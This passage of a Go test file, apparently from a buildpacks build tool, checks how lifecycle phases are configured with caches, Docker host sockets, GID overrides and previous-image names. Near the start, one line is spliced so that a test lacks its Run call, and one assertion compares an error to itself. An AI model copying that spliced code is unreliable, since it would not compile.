h.AssertSliceContains(t, entry.ContainerConfig().Cmd, "/some/image")
}
}
})
})
})
when("Run without using creator", func() {
it("succeeds", func() {
opts := build.LifecycleOptions{
Publish: false,
ClearCache: false,
RunImage: "test",
Image: imageName,
Builder: fakeBuilder,
TrustBuilder: false,
UseCreator: false,
}
lifecycle, err := build.NewLifecycleExecution(logger, docker, opts) | })
h.AssertNil(t, err)
h.AssertEq(t, len(fakePhaseFactory.NewCalledWithProvider), 5)
for _, entry := range fakePhaseFactory.NewCalledWithProvider {
switch entry.Name() {
case "exporter":
h.AssertSliceContains(t, entry.ContainerConfig().Cmd, "/some/image")
case "analyzer":
h.AssertSliceContains(t, entry.ContainerConfig().Cmd, "/some/image")
}
}
})
when("Run with workspace dir", func() {
it("succeeds", func() {
opts := build.LifecycleOptions{
Publish: false,
ClearCache: false,
RunImage: "test",
Image: imageName,
Builder: fakeBuilder,
TrustBuilder: false,
Workspace: "app",
UseCreator: false,
}
lifecycle, err := build.NewLifecycleExecution(logger, docker, opts)
h.AssertNil(t, err)
h.AssertEq(t, filepath.Base(lifecycle.AppDir()), "app")
err = lifecycle.Run(context.Background(), func(execution *build.LifecycleExecution) build.PhaseFactory {
return fakePhaseFactory
})
h.AssertNil(t, err)
h.AssertEq(t, len(fakePhaseFactory.NewCalledWithProvider), 5)
appCount := 0
for _, entry := range fakePhaseFactory.NewCalledWithProvider {
switch entry.Name() {
case "detector", "builder", "exporter":
h.AssertSliceContainsInOrder(t, entry.ContainerConfig().Cmd, "-app", "/app")
appCount++
}
}
h.AssertEq(t, appCount, 3)
})
})
})
when("Error cases", func() {
when("passed invalid cache-image", func() {
it("fails", func() {
opts := build.LifecycleOptions{
Publish: false,
ClearCache: false,
RunImage: "test",
Image: imageName,
Builder: fakeBuilder,
TrustBuilder: false,
UseCreator: false,
CacheImage: "%%%",
}
lifecycle, err := build.NewLifecycleExecution(logger, docker, opts)
h.AssertNil(t, err)
err = lifecycle.Run(context.Background(), func(execution *build.LifecycleExecution) build.PhaseFactory {
return fakePhaseFactory
})
h.AssertError(t, err, fmt.Sprintf("invalid cache image name: %s", "could not parse reference: %%!(NOVERB)"))
})
})
})
})
when("#Create", func() {
var (
fakeBuildCache *fakes.FakeCache
fakeLaunchCache *fakes.FakeCache
)
it.Before(func() {
fakeBuildCache = fakes.NewFakeCache()
fakeBuildCache.ReturnForType = cache.Volume
fakeBuildCache.ReturnForName = "some-cache"
fakeLaunchCache = fakes.NewFakeCache()
fakeLaunchCache.ReturnForType = cache.Volume
fakeLaunchCache.ReturnForName = "some-launch-cache"
})
it("creates a phase and then run it", func() {
lifecycle := newTestLifecycleExec(t, false)
fakePhase := &fakes.FakePhase{}
fakePhaseFactory := fakes.NewFakePhaseFactory(fakes.WhichReturnsForNew(fakePhase))
err := lifecycle.Create(context.Background(), false, "", false, "test", "test", "test", fakeBuildCache, fakeLaunchCache, []string{}, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
h.AssertEq(t, fakePhase.CleanupCallCount, 1)
h.AssertEq(t, fakePhase.RunCallCount, 1)
})
it("configures the phase with the expected arguments", func() {
verboseLifecycle := newTestLifecycleExec(t, true)
fakePhaseFactory := fakes.NewFakePhaseFactory()
expectedRepoName := "some-repo-name"
expectedRunImage := "some-run-image"
err := verboseLifecycle.Create(context.Background(), false, "", false, expectedRunImage, expectedRepoName, "test", fakeBuildCache, fakeLaunchCache, []string{}, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.Name(), "creator")
h.AssertIncludeAllExpectedPatterns(t,
configProvider.ContainerConfig().Cmd,
[]string{"-log-level", "debug"},
[]string{"-run-image", expectedRunImage},
[]string{expectedRepoName},
)
})
it("configures the phase with the expected network mode", func() {
lifecycle := newTestLifecycleExec(t, false)
fakePhaseFactory := fakes.NewFakePhaseFactory()
expectedNetworkMode := "some-network-mode"
err := lifecycle.Create(context.Background(), false, "", false, "test", "test", expectedNetworkMode, fakeBuildCache, fakeLaunchCache, []string{}, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.HostConfig().NetworkMode, container.NetworkMode(expectedNetworkMode))
})
when("clear cache", func() {
it("configures the phase with the expected arguments", func() {
verboseLifecycle := newTestLifecycleExec(t, true)
fakePhaseFactory := fakes.NewFakePhaseFactory()
err := verboseLifecycle.Create(context.Background(), false, "", true, "test", "test", "test", fakeBuildCache, fakeLaunchCache, []string{}, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.Name(), "creator")
h.AssertIncludeAllExpectedPatterns(t,
configProvider.ContainerConfig().Cmd,
[]string{"-skip-restore"},
)
})
})
when("clear cache is false", func() {
it("configures the phase with the expected arguments", func() {
verboseLifecycle := newTestLifecycleExec(t, true)
fakePhaseFactory := fakes.NewFakePhaseFactory()
err := verboseLifecycle.Create(context.Background(), false, "", false, "test", "test", "test", fakeBuildCache, fakeLaunchCache, []string{}, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.Name(), "creator")
h.AssertIncludeAllExpectedPatterns(t,
configProvider.ContainerConfig().Cmd,
[]string{"-cache-dir", "/cache"},
)
})
})
when("using a cache image", func() {
it.Before(func() {
fakeBuildCache.ReturnForType = cache.Image
fakeBuildCache.ReturnForName = "some-cache-image"
})
it("configures the phase with the expected arguments", func() {
verboseLifecycle := newTestLifecycleExec(t, true)
fakePhaseFactory := fakes.NewFakePhaseFactory()
err := verboseLifecycle.Create(context.Background(), false, "", true, "test", "test", "test", fakeBuildCache, fakeLaunchCache, []string{}, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.Name(), "creator")
h.AssertIncludeAllExpectedPatterns(t,
configProvider.ContainerConfig().Cmd,
[]string{"-skip-restore"},
[]string{"-cache-image", "some-cache-image"},
)
h.AssertSliceNotContains(t, configProvider.HostConfig().Binds, ":/cache")
})
})
when("additional tags are specified", func() {
it("configures phases with additional tags", func() {
lifecycle := newTestLifecycleExec(t, false)
fakePhaseFactory := fakes.NewFakePhaseFactory()
additionalTags := []string{"additional-tag-1", "additional-tag-2"}
err := lifecycle.Create(context.Background(), false, "", false, "test", "test", "test", fakes.NewFakeCache(), fakes.NewFakeCache(), additionalTags, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertIncludeAllExpectedPatterns(t,
configProvider.ContainerConfig().Cmd,
[]string{"-tag", additionalTags[0], "-tag", additionalTags[1]},
)
})
})
when("publish", func() {
var (
fakeBuildCache *fakes.FakeCache
fakeLaunchCache *fakes.FakeCache
)
it.Before(func() {
fakeBuildCache = fakes.NewFakeCache()
fakeBuildCache.ReturnForName = "some-cache"
fakeBuildCache.ReturnForType = cache.Volume
fakeLaunchCache = fakes.NewFakeCache()
fakeLaunchCache.ReturnForType = cache.Volume
fakeLaunchCache.ReturnForName = "some-launch-cache"
})
it("configures the phase with binds", func() {
lifecycle := newTestLifecycleExec(t, false)
fakePhaseFactory := fakes.NewFakePhaseFactory()
volumeMount := "custom-mount-source:/custom-mount-target"
expectedBinds := []string{volumeMount, "some-cache:/cache"}
err := lifecycle.Create(context.Background(), true, "", false, "test", "test", "test", fakeBuildCache, fakeLaunchCache, []string{}, []string{volumeMount}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertSliceContains(t, configProvider.HostConfig().Binds, expectedBinds...)
})
it("configures the phase with root", func() {
lifecycle := newTestLifecycleExec(t, false)
fakePhaseFactory := fakes.NewFakePhaseFactory()
err := lifecycle.Create(context.Background(), true, "", false, "test", "test", "test", fakeBuildCache, fakeLaunchCache, []string{}, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.ContainerConfig().User, "root")
})
it("configures the phase with registry access", func() {
lifecycle := newTestLifecycleExec(t, false)
fakePhaseFactory := fakes.NewFakePhaseFactory()
expectedRepos := "some-repo-name"
err := lifecycle.Create(context.Background(), true, "", false, "test", expectedRepos, "test", fakeBuildCache, fakeLaunchCache, []string{}, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertSliceContains(t, configProvider.ContainerConfig().Env, "CNB_REGISTRY_AUTH={}")
})
when("using a cache image", func() {
it.Before(func() {
fakeBuildCache.ReturnForType = cache.Image
fakeBuildCache.ReturnForName = "some-cache-image"
})
it("configures the phase with the expected arguments", func() {
verboseLifecycle := newTestLifecycleExec(t, true)
fakePhaseFactory := fakes.NewFakePhaseFactory()
err := verboseLifecycle.Create(context.Background(), true, "", true, "test", "test", "test", fakeBuildCache, fakeLaunchCache, []string{}, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.Name(), "creator")
h.AssertIncludeAllExpectedPatterns(t,
configProvider.ContainerConfig().Cmd,
[]string{"-skip-restore"},
[]string{"-cache-image", "some-cache-image"},
)
h.AssertSliceNotContains(t, configProvider.HostConfig().Binds, ":/cache")
})
})
when("platform 0.3", func() {
var (
fakeBuildCache *fakes.FakeCache
fakeLaunchCache *fakes.FakeCache
)
it.Before(func() {
fakeBuildCache = fakes.NewFakeCache()
fakeBuildCache.ReturnForName = "some-cache"
fakeBuildCache.ReturnForType = cache.Volume
fakeLaunchCache = fakes.NewFakeCache()
fakeLaunchCache.ReturnForType = cache.Volume
fakeLaunchCache.ReturnForName = "some-launch-cache"
})
it("doesn't hint at default process type", func() {
fakeBuilder, err := fakes.NewFakeBuilder(fakes.WithSupportedPlatformAPIs([]*api.Version{api.MustParse("0.3")}))
h.AssertNil(t, err)
lifecycle := newTestLifecycleExec(t, true, fakes.WithBuilder(fakeBuilder))
fakePhaseFactory := fakes.NewFakePhaseFactory()
err = lifecycle.Export(context.Background(), "test", "test", true, "", "test", fakeBuildCache, fakeLaunchCache, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertSliceNotContains(t, configProvider.ContainerConfig().Cmd, "-process-type")
})
})
when("platform 0.4", func() {
it("hints at default process type", func() {
fakeBuilder, err := fakes.NewFakeBuilder(fakes.WithSupportedPlatformAPIs([]*api.Version{api.MustParse("0.4")}))
h.AssertNil(t, err)
lifecycle := newTestLifecycleExec(t, true, fakes.WithBuilder(fakeBuilder))
fakePhaseFactory := fakes.NewFakePhaseFactory()
err = lifecycle.Export(context.Background(), "test", "test", true, "", "test", fakeBuildCache, fakeLaunchCache, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertIncludeAllExpectedPatterns(t, configProvider.ContainerConfig().Cmd, []string{"-process-type", "web"})
})
})
when("platform >= 0.6", func() {
when("no user provided process type is present", func() {
it("doesn't provide 'web' as default process type", func() {
fakeBuilder, err := fakes.NewFakeBuilder(fakes.WithSupportedPlatformAPIs([]*api.Version{api.MustParse("0.6")}))
h.AssertNil(t, err)
lifecycle := newTestLifecycleExec(t, true, fakes.WithBuilder(fakeBuilder))
fakePhaseFactory := fakes.NewFakePhaseFactory()
err = lifecycle.Export(context.Background(), "test", "test", true, "", "test", fakeBuildCache, fakeLaunchCache, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertSliceNotContains(t, configProvider.ContainerConfig().Cmd, "-process-type")
})
})
})
})
when("publish is false", func() {
var (
fakeBuildCache *fakes.FakeCache
fakeLaunchCache *fakes.FakeCache
)
it.Before(func() {
fakeBuildCache = fakes.NewFakeCache()
fakeBuildCache.ReturnForName = "some-cache"
fakeBuildCache.ReturnForType = cache.Volume
fakeLaunchCache = fakes.NewFakeCache()
fakeLaunchCache.ReturnForType = cache.Volume
fakeLaunchCache.ReturnForName = "some-launch-cache"
})
it("configures the phase with the expected arguments", func() {
verboseLifecycle := newTestLifecycleExec(t, true)
fakePhaseFactory := fakes.NewFakePhaseFactory()
err := verboseLifecycle.Create(context.Background(), false, "", false, "test", "test", "test", fakeBuildCache, fakeLaunchCache, []string{}, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.Name(), "creator")
h.AssertIncludeAllExpectedPatterns(t,
configProvider.ContainerConfig().Cmd,
[]string{"-daemon"},
[]string{"-launch-cache", "/launch-cache"},
)
})
it("configures the phase with daemon access", func() {
lifecycle := newTestLifecycleExec(t, false)
fakePhaseFactory := fakes.NewFakePhaseFactory()
err := lifecycle.Create(context.Background(), false, "", false, "test", "test", "test", fakeBuildCache, fakeLaunchCache, []string{}, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.ContainerConfig().User, "root")
h.AssertSliceContains(t, configProvider.HostConfig().Binds, "/var/run/docker.sock:/var/run/docker.sock")
})
it("configures the phase with daemon access with tcp docker-host", func() {
lifecycle := newTestLifecycleExec(t, false)
fakePhaseFactory := fakes.NewFakePhaseFactory()
err := lifecycle.Create(context.Background(), false, "tcp://localhost:1234", false, "test", "test", "test", fakeBuildCache, fakeLaunchCache, []string{}, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertSliceNotContains(t, configProvider.HostConfig().Binds, "/var/run/docker.sock:/var/run/docker.sock")
h.AssertSliceContains(t, configProvider.ContainerConfig().Env, "DOCKER_HOST=tcp://localhost:1234")
})
it("configures the phase with daemon access with alternative unix socket docker-host", func() {
lifecycle := newTestLifecycleExec(t, false)
fakePhaseFactory := fakes.NewFakePhaseFactory()
err := lifecycle.Create(context.Background(), false, "unix:///home/user/docker.sock", false, "test", "test", "test", fakeBuildCache, fakeLaunchCache, []string{}, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertSliceContains(t, configProvider.HostConfig().Binds, "/home/user/docker.sock:/var/run/docker.sock")
})
it("configures the phase with daemon access with alternative windows pipe docker-host", func() {
lifecycle := newTestLifecycleExec(t, false)
fakePhaseFactory := fakes.NewFakePhaseFactory()
err := lifecycle.Create(context.Background(), false, `npipe:\\\\.\pipe\docker_engine_alt`, false, "test", "test", "test", fakeBuildCache, fakeLaunchCache, []string{}, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertSliceNotContains(t, configProvider.HostConfig().Binds, "/home/user/docker.sock:/var/run/docker.sock")
h.AssertSliceContains(t, configProvider.HostConfig().Binds, `\\.\pipe\docker_engine_alt:\\.\pipe\docker_engine`)
})
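// A docker-host value of "inherit" forwards the DOCKER_HOST from the test
// process environment into the phase container.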
when("environment variable DOCKER_HOST is set", func() {
var (
oldDH string
oldDHExists bool
)
it.Before(func() {
oldDH, oldDHExists = os.LookupEnv("DOCKER_HOST")
os.Setenv("DOCKER_HOST", "tcp://example.com:1234")
})
it.After(func() {
if oldDHExists {
os.Setenv("DOCKER_HOST", oldDH)
} else {
os.Unsetenv("DOCKER_HOST")
}
})
it("configures the phase with daemon access with inherited docker-host", func() {
lifecycle := newTestLifecycleExec(t, false)
fakePhaseFactory := fakes.NewFakePhaseFactory()
err := lifecycle.Create(context.Background(), false, `inherit`, false, "test", "test", "test", fakeBuildCache, fakeLaunchCache, []string{}, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertSliceContains(t, configProvider.ContainerConfig().Env, "DOCKER_HOST=tcp://example.com:1234")
})
})
it("configures the phase with daemon access with docker-host with unknown protocol", func() {
lifecycle := newTestLifecycleExec(t, false)
fakePhaseFactory := fakes.NewFakePhaseFactory()
err := lifecycle.Create(context.Background(), false, `withoutprotocol`, false, "test", "test", "test", fakeBuildCache, fakeLaunchCache, []string{}, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertSliceContains(t, configProvider.ContainerConfig().Env, "DOCKER_HOST=withoutprotocol")
})
it("configures the phase with binds", func() {
lifecycle := newTestLifecycleExec(t, false)
fakePhaseFactory := fakes.NewFakePhaseFactory()
volumeMount := "custom-mount-source:/custom-mount-target"
expectedBinds := []string{volumeMount, "some-cache:/cache", "some-launch-cache:/launch-cache"}
err := lifecycle.Create(context.Background(), false, "", false, "test", "test", "test", fakeBuildCache, fakeLaunchCache, []string{}, []string{volumeMount}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertSliceContains(t, configProvider.HostConfig().Binds, expectedBinds...)
})
when("platform 0.3", func() {
it("doesn't hint at default process type", func() {
fakeBuilder, err := fakes.NewFakeBuilder(fakes.WithSupportedPlatformAPIs([]*api.Version{api.MustParse("0.3")}))
h.AssertNil(t, err)
lifecycle := newTestLifecycleExec(t, true, fakes.WithBuilder(fakeBuilder))
fakePhaseFactory := fakes.NewFakePhaseFactory()
err = lifecycle.Export(context.Background(), "test", "test", false, "", "test", fakeBuildCache, fakeLaunchCache, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertSliceNotContains(t, configProvider.ContainerConfig().Cmd, "-process-type")
})
})
when("platform 0.4", func() {
it("hints at default process type", func() {
fakeBuilder, err := fakes.NewFakeBuilder(fakes.WithSupportedPlatformAPIs([]*api.Version{api.MustParse("0.4")}))
h.AssertNil(t, err)
lifecycle := newTestLifecycleExec(t, true, fakes.WithBuilder(fakeBuilder))
fakePhaseFactory := fakes.NewFakePhaseFactory()
err = lifecycle.Export(context.Background(), "test", "test", false, "", "test", fakeBuildCache, fakeLaunchCache, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertIncludeAllExpectedPatterns(t, configProvider.ContainerConfig().Cmd, []string{"-process-type", "web"})
})
})
when("platform >= 0.6", func() {
when("no user provided process type is present", func() {
it("doesn't provide 'web' as default process type", func() {
fakeBuilder, err := fakes.NewFakeBuilder(fakes.WithSupportedPlatformAPIs([]*api.Version{api.MustParse("0.6")}))
h.AssertNil(t, err)
lifecycle := newTestLifecycleExec(t, true, fakes.WithBuilder(fakeBuilder))
fakePhaseFactory := fakes.NewFakePhaseFactory()
err = lifecycle.Export(context.Background(), "test", "test", false, "", "test", fakeBuildCache, fakeLaunchCache, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertSliceNotContains(t, configProvider.ContainerConfig().Cmd, "-process-type")
})
})
})
})
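// GID override for Create: a non-negative GID is passed to the creator as
// -gid; the sentinel value -1 omits the flag entirely.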
when("override GID", func() {
when("override GID is provided", func() {
it("configures the phase with the expected arguments", func() {
verboseLifecycle := newTestLifecycleExec(t, true, func(options *build.LifecycleOptions) {
options.GID = 2
})
fakePhaseFactory := fakes.NewFakePhaseFactory()
err := verboseLifecycle.Create(context.Background(), false, "", true, "test", "test", "test", fakeBuildCache, fakeLaunchCache, []string{}, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.Name(), "creator")
h.AssertIncludeAllExpectedPatterns(t,
configProvider.ContainerConfig().Cmd,
[]string{"-gid", "2"},
)
})
})
when("override GID is not provided", func() {
it("gid is not added to the expected arguments", func() {
verboseLifecycle := newTestLifecycleExec(t, true, func(options *build.LifecycleOptions) {
options.GID = -1
})
fakePhaseFactory := fakes.NewFakePhaseFactory()
err := verboseLifecycle.Create(context.Background(), false, "", true, "test", "test", "test", fakeBuildCache, fakeLaunchCache, []string{}, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.Name(), "creator")
h.AssertSliceNotContains(t, configProvider.ContainerConfig().Cmd, "-gid")
})
})
})
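// Previous-image handling: invalid image or previous-image names error out,
// and when publishing, previous-image must share a registry with the target
// image.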
when("-previous-image is used", func() {
when("image is invalid", func() {
it("errors", func() {
var imageName name.Tag
imageName, err := name.NewTag("/x/y/?!z", name.WeakValidation)
h.AssertError(t, err, "repository can only contain the runes `abcdefghijklmnopqrstuvwxyz0123456789_-./`")
lifecycle := newTestLifecycleExec(t, true, func(options *build.LifecycleOptions) {
options.Image = imageName
options.PreviousImage = "previous-image"
})
fakePhaseFactory := fakes.NewFakePhaseFactory()
err = lifecycle.Create(context.Background(), false, "", false, "test", "test", "test", fakeBuildCache, fakeLaunchCache, []string{}, []string{}, fakePhaseFactory)
h.AssertError(t, err, "invalid image name")
})
})
when("previous-image is invalid", func() {
it("errors", func() {
var imageName name.Tag
imageName, err := name.NewTag("/some/image", name.WeakValidation)
h.AssertNil(t, err)
lifecycle := newTestLifecycleExec(t, true, func(options *build.LifecycleOptions) {
options.PreviousImage = "%%%"
options.Image = imageName
})
fakePhaseFactory := fakes.NewFakePhaseFactory()
err = lifecycle.Create(context.Background(), false, "", false, "test", "test", "test", fakeBuildCache, fakeLaunchCache, []string{}, []string{}, fakePhaseFactory)
h.AssertError(t, err, "invalid previous image name")
})
})
when("--publish is false", func() {
it("passes previous-image to creator", func() {
var imageName name.Tag
imageName, err := name.NewTag("/some/image", name.WeakValidation)
h.AssertNil(t, err)
lifecycle := newTestLifecycleExec(t, true, func(options *build.LifecycleOptions) {
options.PreviousImage = "previous-image"
options.Image = imageName
})
fakePhaseFactory := fakes.NewFakePhaseFactory()
err = lifecycle.Create(context.Background(), false, "", false, "test", "test", "test", fakeBuildCache, fakeLaunchCache, []string{}, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.Name(), "creator")
h.AssertIncludeAllExpectedPatterns(t, configProvider.ContainerConfig().Cmd, []string{"-previous-image", "previous-image"})
})
})
when("--publish is true", func() {
when("previous-image and image are in the same registry", func() {
it("successfully passes previous-image to creator", func() {
var imageName name.Tag
imageName, err := name.NewTag("/some/image", name.WeakValidation)
h.AssertNil(t, err)
lifecycle := newTestLifecycleExec(t, true, func(options *build.LifecycleOptions) {
options.PreviousImage = "index.docker.io/some/previous:latest"
options.Image = imageName
})
fakePhaseFactory := fakes.NewFakePhaseFactory()
err = lifecycle.Create(context.Background(), true, "", false, "test", "test", "test", fakeBuildCache, fakeLaunchCache, []string{}, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.Name(), "creator")
h.AssertIncludeAllExpectedPatterns(t, configProvider.ContainerConfig().Cmd, []string{"-previous-image", "index.docker.io/some/previous:latest"})
})
})
when("previous-image and image are not in the same registry", func() {
it("errors", func() {
var imageName name.Tag
imageName, err := name.NewTag("/some/image", name.WeakValidation)
h.AssertNil(t, err)
lifecycle := newTestLifecycleExec(t, true, func(options *build.LifecycleOptions) {
options.PreviousImage = "example.io/some/previous:latest"
options.Image = imageName
})
fakePhaseFactory := fakes.NewFakePhaseFactory()
err = lifecycle.Create(context.Background(), true, "", false, "test", "test", "test", fakeBuildCache, fakeLaunchCache, []string{}, []string{}, fakePhaseFactory)
// Note: comparing the error message to itself reduces this assertion to a
// non-nil check; the specific registry-mismatch message is not pinned here.
h.AssertError(t, err, fmt.Sprintf("%s", err))
})
})
})
})
})
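// #Detect: the detector phase honors verbosity, network mode, and volume
// binds, and copies the app directory into the container before detection.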
when("#Detect", func() {
it("creates a phase and then runs it", func() {
lifecycle := newTestLifecycleExec(t, false)
fakePhase := &fakes.FakePhase{}
fakePhaseFactory := fakes.NewFakePhaseFactory(fakes.WhichReturnsForNew(fakePhase))
err := lifecycle.Detect(context.Background(), "test", []string{}, fakePhaseFactory)
h.AssertNil(t, err)
h.AssertEq(t, fakePhase.CleanupCallCount, 1)
h.AssertEq(t, fakePhase.RunCallCount, 1)
})
it("configures the phase with the expected arguments", func() {
verboseLifecycle := newTestLifecycleExec(t, true)
fakePhaseFactory := fakes.NewFakePhaseFactory()
err := verboseLifecycle.Detect(context.Background(), "test", []string{"test"}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.Name(), "detector")
h.AssertIncludeAllExpectedPatterns(t,
configProvider.ContainerConfig().Cmd,
[]string{"-log-level", "debug"},
)
})
it("configures the phase with the expected network mode", func() {
lifecycle := newTestLifecycleExec(t, false)
fakePhaseFactory := fakes.NewFakePhaseFactory()
expectedNetworkMode := "some-network-mode"
err := lifecycle.Detect(context.Background(), expectedNetworkMode, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.HostConfig().NetworkMode, container.NetworkMode(expectedNetworkMode))
})
it("configures the phase to copy app dir", func() {
lifecycle := newTestLifecycleExec(t, false)
fakePhaseFactory := fakes.NewFakePhaseFactory()
expectedBind := "some-mount-source:/some-mount-target"
err := lifecycle.Detect(context.Background(), "test", []string{expectedBind}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
